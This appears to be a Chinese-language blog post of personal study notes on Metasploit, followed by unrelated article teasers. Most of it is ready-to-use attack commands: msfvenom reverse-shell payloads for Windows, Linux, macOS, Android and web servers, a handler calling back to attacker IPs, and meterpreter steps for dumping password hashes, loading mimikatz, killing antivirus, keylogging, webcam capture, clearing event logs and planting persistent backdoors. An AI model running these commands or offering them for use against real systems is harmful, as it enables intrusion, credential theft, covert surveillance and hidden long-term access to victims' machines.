8月13日笔记

news2024/9/21 0:33:03

msf补充
使用方法:
进入框架:msfconsole
使用search命令查找相关漏洞:search ms14-058
使用info查看模块信息:info
我们也可以将攻击代码写configure.rc(只要是以 .rc 结尾的文件)配置文件中,然后使用命令
msfconsole -r configure.rc 进行自动攻击

msfvenom生成shellcode

msfvenom -a 系统架构 --platform 系统平台 -p 有效载荷 lhost=攻击机IP lport=攻击机端口
-e 编码方式 -i编码次数 -f 输出格式 -o 输出文件
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=8888 -i 3-e x86/shikata_ga_nai -f exe -o payload.exe

msfvenom --list archs #查看支持的系统架构 --list可以用 -l代替
QQ_1723541633969.png
msfvenom --list platforms #查看支持系统平台
QQ_1723541713973.png
msfvenom -l payload #列出所有可用的payload
msfvenom -l formats #列出所有的输出格式
msfvenom -l encrypt #列出所有的加密方式
msfvenom -l encoders #列出所有的编码器

常见生成格式

windows

msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.5.128 lport=4444 -f exe -o payload.exe

linux

msfvenom --platform linux -a x86 -p linux/x86/meterpreter/reverse_tcp -f elf -o payload.elf

mac

msfvenom --platform osx -a x86 -p osx/x86/shell_reverse_tcp -f macho -o payload.macho

android

msfvenom -p android/meterpreter/reverse_tcp -o payload.apk

aspx

msfvenom --platform windows-p windows/meterpreter/reverse_tcp -f aspx -o payload.aspx

bash

msfvenom -p cmd/unix/reverse_bash -f raw -o shell.sh

jsp

msfvenom --platform java -p java/jsp_shell_reverse_tcp -f raw -o payload.jsp

msf有6个模块

auxiliary #负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能的辅助模块
exploits  #利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动)
payloads  #成功exploit之后,真正在目标系统执行的代码或指令。分为3种类型的payload,分别是
single、stages和stagers。
nops    #提高payload稳定性及维持大小。
post    #后期渗透模块。在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信
息、跳板攻击等操作

kali加载自定义模块

下载一个rb文件的exploit文件
拷贝到framework/modules/exploits中
msf中执行reload_all 重新加载模块
注意:上述过程在MSF6中操作。

监听:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.108
set LPORT 4445
exploit

msf后渗透阶段

成功监听对方主机之后,我们将会看到提示符meterpreter。
输入 shell即可切换到目标主机的windows shell,要想从目标主机shell退出到 meterpreter,我们只需输入:exit
QQ_1723545011139.png
发现乱码,输入chcp 65001来解决,也可以用kali终端的字符编码格式来解决。
QQ_1723545137576.png
在meterpreter命令行下

sysinfo       #查看目标主机系统信息
run scraper     #查看目标主机详细信息
run hashdump     #导出密码的哈希
load kiwi      #加载mimikatz
ps          #查看目标主机进程信息
pwd         #查看目标当前目录(windows)
getlwd        #查看目标当前目录(Linux)
search -f *.jsp -d e:\         #搜索E盘中所有以.jsp为后缀的文件
download  e:\test.txt  /root      #将目标机的e:\test.txt文件下载到/root目录下
upload   /root/test.txt d:\test    #将/root/test.txt上传到目标机的 d:\test\ 目录下
getpid        #查看当前Meterpreter Shell的进程PID
migrate 1384     #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime       #查看主机运行时间
getuid        #查看获取的当前权限
getsystem      #提权。
run  killav     #关闭杀毒软件
screenshot      #截图
webcam_list     #查看目标主机的摄像头
webcam_snap     #拍照
webcam_stream    #开视频
execute  参数  -f 可执行文件  #执行可执行程序
run getgui -u hack -p 123   #创建hack用户,密码为123
run getgui -e         #开启远程桌面
keyscan_start         #开启键盘记录功能
keyscan_dump         #显示捕捉到的键盘记录信息
keyscan_stop         #停止键盘记录功能
uictl  disable  keyboard   #禁止目标使用键盘
uictl  enable  keyboard   #允许目标使用键盘
uictl  disable  mouse     #禁止目标使用鼠标
uictl  enable  mouse     #允许目标使用鼠标
load             #使用扩展库
run       #使用扩展库
run persistence -X -i 5 -p 8888 -r 192.168.10.27     #反弹时间间隔是5s 会自动连接
192.168.27的4444端口,缺点是容易被杀毒软件查杀
portfwd add -l 3389 -r 192.168.11.13 -p 3389   #将192.168.11.13的3389端口转发到本
地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址
clearev    #清除日志

post后渗透模块

该模块主要用于在取得目标主机系统远程控制权后,进行一系列的后渗透攻击动作。

run post/windows/manage/migrate      #自动进程迁移
run post/windows/gather/checkvm      #查看目标主机是否运行在虚拟机上
run post/windows/manage/killav       #关闭杀毒软件
run post/windows/manage/enable_rdp     #开启远程桌面服务
run post/windows/manage/autoroute     #查看路由信息
run post/windows/gather/enum_logged_on_users   #列举当前登录的用户
run post/windows/gather/enum_applications    #列举应用程序
run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码
run post/windows/gather/smart_hashdump  

Meterpreter支持非常多的文件系统命令(基本跟Linux系统命令类似),一些常用命令如下:
cd:切换目标目录;
cat:读取文件内容;
rm:删除文件;
edit:使用vim编辑文件
ls:获取当前目录下的文件;
mkdir:新建目录;
rmdir:删除目录;
QQ_1723546169782.png
有时候对方主机不是系统权限,有限操作无法展开,使用getsystem提升权限,提权的成功率取决于许多因素,包括目标系统的安全配置、补丁级别以及是否启用了某些安全措施(如 UAC)。
QQ_1723546289082.png
这里我本来就是最高权限。

生成持续性后门。

因为 meterpreter 是基于内存DLL建立的连接,所以,只要目标主机关机,我们的连接就会断。总不可
能我们每次想连接的时候,每次都去攻击,然后再利用 meterpreter 建立连接。所以,我们得在目标主
机系统内留下一个持续性的后门,只要目标主机开机了,我们就可以连接到该主机。
建立持续性后门有两种方法,一种是通过启动项启动(persistence) ,一种是通过 服务启动(metsvc)
启动项启动
用msfvenom生成shell放大windows的启动目录下:

C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

这样对方主机每次开机就能启动shell。只要监听相应的端口就行了。
服务启动

run persistence -X -i 5 -p 4444 -r 192.168.5.128  #反弹时间间隔是5s 会自动连接
192.168.5.128的4444端口,缺点是容易被杀毒软件查杀,然后它就在目标机新建了这个文件:
C:\Windows\TEMP\jRBGTRRznuL.vbs ,并把该服务加入了注册表中,只要开机就会启动

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2034943.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【数学建模】介绍论文书写格式

🌈个人主页:Yui_ 🌈Linux专栏:Linux 🌈C语言笔记专栏:C语言笔记 🌈数据结构专栏:数据结构 文章目录 1.论文整体排版2. 标题书写3.摘要书写4.参考文献5.公式编辑5.1 常用公式编辑方法…

JavaScript 逆向技巧总结

本节属于知识总结,只是对思路的梳理,不对具体内容进行展开 JS 逆向可以分为三大部分: 寻找入口, 调试分析, 模拟执行 寻找入口: 这是非常关键的一步,逆向在大部分情况下就是找一些加密参数到底…

Linux磁盘管理与文件系统(二):实用工具和命令、fdisk分区示例

文章目录 4、查看或管理磁盘分区-fdisk格式选项示例 4、示例:使用 fdisk 命令创建分区需求操作步骤 5、创建文件系统-mkfs格式常用选项示例创建其他类型的文件系统 6、创建文件系统-mkswap格式常用选项示例拓展:关闭和启用交换分区拓展:swap分…

搬瓦工澳大利亚AS9929 VPS测评

搬瓦工澳大利亚vps怎么样?搬瓦工澳大利亚悉尼数据中心在运作CUII/AS9929线路的VPS,底层为KVM虚拟,纯SSD阵列,1Gbps带宽... 目前看到的是CPU主频是2.4GHz,接入XTOM网络,IP归属澳大利亚,当前大致I…

window好用的批量远程桌面连接工具

下载 安装 Remote Desktop Connection Manager 添加server

AlexNet模型搭建(三部曲_2)

文章目录 1模型介绍2 模型搭建3 模型训练4 模型预测 猫狗二分类&#xff0c;模型简单&#xff0c;训练精度并不高。数据集下载&#xff1a;<https://aistudio.baidu.com/datasetdetail/26884> 百度飞浆上找的大小只有60多M 1模型介绍 AlexNet是一个卷积神经网络的名字&a…

Linux命令(基础面试可用,都是自己觉得平时使用多的)

1.cat 参数&#xff1a;-n&#xff1a;显示行号-s&#xff1a;压缩连续的空行&#xff0c;只显示一个空行2.chattr 改变文件属性 语法&#xff1a;chattr [-RV] [/-/<属性>][文件或目录] 属性&#xff1a;a&#xff1a;让文件或目录仅供附加用途i&#xff1a;不得任意更…

MediaPipe人体姿态、手指关键点检测

MediaPipe人体姿态、手指关键点检测 文章目录 MediaPipe人体姿态、手指关键点检测前言一、手指关键点检测二、姿态检测三、3D物体案例检测案例 前言 Mediapipe是google的一个开源项目&#xff0c;用于构建机器学习管道。   提供了16个预训练模型的案例&#xff1a;人脸检测、…

基于级联深度学习算法的前列腺病灶检测在双参数MRI中的评估| 文献速递-基于深度学习的乳房、前列腺疾病诊断系统

Title 题目 Evaluation of a Cascaded Deep Learning–based Algorithm for Prostate Lesion Detection at Biparametric MRI 基于级联深度学习算法的前列腺病灶检测在双参数MRI中的评估 Background 背景 Multiparametric MRI (mpMRI) improves prostate cancer (PCa) de…

从西安出发,走向世界——西安国际数字影像产业园跻身全国十大产业园区行列

西安&#xff0c;作为中国历史文化名城&#xff0c;不仅以其丰富的历史遗产闻名于世&#xff0c;还逐渐成为现代科技和产业发展的新高地。产业园区成为推动经济增长和创新发展的重要引擎&#xff0c;西安国际数字影像产业园&#xff0c;正怀揣着雄心壮志&#xff0c;向着全国十…

idea git拉取代码can‘t update

idea有时候创建的新分支&#xff0c;提交以后却无法拉去代码&#xff0c;提示如下错误信息&#xff1a; cant update No tracked branch configured for branch 在idea的“Terminal”窗口中输入如下命令即可 git branch --set-upstream-to origin 找不到Terminal的可以参考下图…

ESP32S3 IDF 对 16路输入输出芯片MCP23017做了个简单的测试

这次还是使用了idf老版本4.4.7&#xff0c;上次用了5.3&#xff0c;感觉不好用&#xff0c;官方的MCP23017芯片是英文版&#xff0c;真的很难读明白&#xff0c;可能是我英语水平不够吧。先看看每个寄存器的功能&#xff1a; IODIRA 和 IODIRB: 输入/输出方向寄存器 IPOLA 和 I…

B端界面升级就是升级颜值,错了,这样想就片面啦。

在B端应用的发展中&#xff0c;界面升级是非常重要的一环。然而&#xff0c;界面级不仅仅是为了提升外观颜值&#xff0c;还需要关注用户体验、功能增强和效率提升等方面。 虽然美观的界面可以吸引用户的眼球&#xff0c;但如果功能不完善&#xff0c;用户可能会选择其他产品。…

LVS负载均衡(twenty-six day)

一、LVS &#xff08;一&#xff09;什么是LVS linux virtural server的简称&#xff0c;也就是linxu虚拟机服务器&#xff0c;这是一个由章文岩博士发起的开源项目&#xff0c;官网是http://www.linuxvirtualserver.org,现在lvs已经是linux内核标准的-部分&#xff0c;使用lv…

vue 实现上浮气泡效果

一、 效果 二、代码 1.用 li 来做每个气泡 <div class"dataSea_middle_bottom"><ul><liv-for"(item,index) in keyBusiness":key"index"class"pops animal"><p class"fb">{{ item.name}}</p>…

Java面试题(一)----Java基础

基础 Java中和equals有什么区别&#xff1f; 一个是运算符&#xff0c;一个是方法。 如果比较的对象是基本数据类型&#xff0c;则比较数值是否相等&#xff1b;如果比较的是引用数据类型&#xff0c;则比较的是对象的内存地址是否相等。 因为Java只有值传递&#xff0c;对于…

SQL Zoo 9-.Window functions

以下数据均来自SQL Zoo 1.Show the lastName, party and votes for the constituency S14000024 in 2017.&#xff08;显示2017年选区“S14000024”的姓氏、政党和选票&#xff09; SELECT lastName, party, votesFROM geWHERE constituency S14000024 AND yr 2017 ORDER BY…

开启IDEA打开新项目时窗口提示

1.背景 实际开发中很多时候,我们会同时打开多个项目,或者项目切换, 这时候有2中情况,打开新窗口或者在当前窗口打开(即:关闭当前窗口,打开新窗口) 具体是那种情况,要根据实际场景,因此我们希望可以弹框提示: 是打开新窗口,还是在当前窗口打开 具体设置如下: 2.步骤 3.测试…

中国科技统计年鉴,数据覆盖1991-2022年多年份

基本信息. 数据名称: 中国科技统计年鉴 数据格式: excel 数据时间: 1991-2022年 数据几何类型: xlsx 数据坐标系: WGS84 数据来源&#xff1a;国家统计局 数据预览&#xff1a; 数据可视化.

zabbix“专家坐诊”第251期问答

问题一 Q&#xff1a;zabbix模板自带的监控项很多都不需要&#xff0c;也不用删除&#xff0c;就是怎么让他们都不展示出来 A&#xff1a;禁用掉 Q&#xff1a;还是在的&#xff0c;我想要就看不见&#xff0c;不是不启用&#xff0c;想要效果跟删除一样&#xff0c;看不见&am…